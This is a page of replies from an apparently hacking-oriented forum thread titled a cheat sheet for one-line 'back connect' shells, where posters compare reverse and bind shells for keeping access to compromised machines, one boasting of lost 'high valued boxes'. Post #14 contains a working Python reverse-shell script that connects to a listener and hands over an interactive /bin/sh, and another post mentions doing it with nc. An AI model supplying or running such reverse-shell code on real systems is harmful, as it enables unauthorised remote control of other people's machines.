The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thirteen Years of Service
Posts: 2,723
Threads: 223
RE: [CHEAT SHEET] One-line back connect 06-23-2014, 02:55 AM
#11
(06-23-2014, 02:53 AM)Kosaki Wrote: Isn't the entire point of back connecting to get a remote shell?????????????????????!!!!!!!!!!
backconnecting is a reverse shell its not good for maintaining access.
•
Twelve Years of Service
Posts: 396
Threads: 37
RE: [CHEAT SHEET] One-line back connect 06-23-2014, 02:56 AM
#12
(06-23-2014, 02:55 AM)Adorapuff Wrote: backconnecting is a reverse shell its not good for maintaining access.
If you get a shell on the box the first time, surely you'd be competent enough to get on a 2nd time no problem..
Unleash the lead from my pistol into my head bumpin' crystal
•
Thirteen Years of Service
Posts: 2,723
Threads: 223
RE: [CHEAT SHEET] One-line back connect 06-23-2014, 03:01 AM
#13
(06-23-2014, 02:56 AM)Kosaki Wrote: If you get a shell on the box the first time, surely you'd be competent enough to get on a 2nd time no problem..
You'd be surprised at how many high valued boxes I lost because of reverse shells.
•
Thirteen Years of Service
Posts: 504
Threads: 47
RE: [CHEAT SHEET] One-line back connect 06-23-2014, 06:41 AM
#14
Please put your code in [.code] tags, If you don't, the newline character gets coppied, and people will complain when it dosen't work. Also, python fixed up for python 3.x
Code:
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
addr = ("10.0.0.1",1234)
s.connect(addr)
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
•
Twelve Years of Service
Posts: 467
Threads: 35
RE: [CHEAT SHEET] One-line back connect 06-23-2014, 09:28 AM
#15
(06-22-2014, 06:25 PM)Adorapuff Wrote: Backconnect is lame. Remote shell is better.
Remote shell => Anyone can gain access to it whereas Backconnect is selective
Remote shell => Often has to replace a running daemon, which makes its existence VERY noticeable.
•
Twelve Years of Service
Posts: 22
Threads: 14
RE: [CHEAT SHEET] One-line back connect 07-10-2014, 01:17 AM
#16
bc with nc lol , but your post is good for new members
•
Twelve Years of Service
Posts: 11
Threads: 0
RE: [CHEAT SHEET] One-line back connect 07-15-2014, 10:21 AM
#17
I think what he means by remote shell is The original ..You connect to them BAckdoor...The opposite of Revearse connect Am I right ? ..Well that would be crap cos then you have to have UpnP code to forward & Open the port and if they don't have that then Your Fucked
•
Users browsing this thread: 1 Guest(s)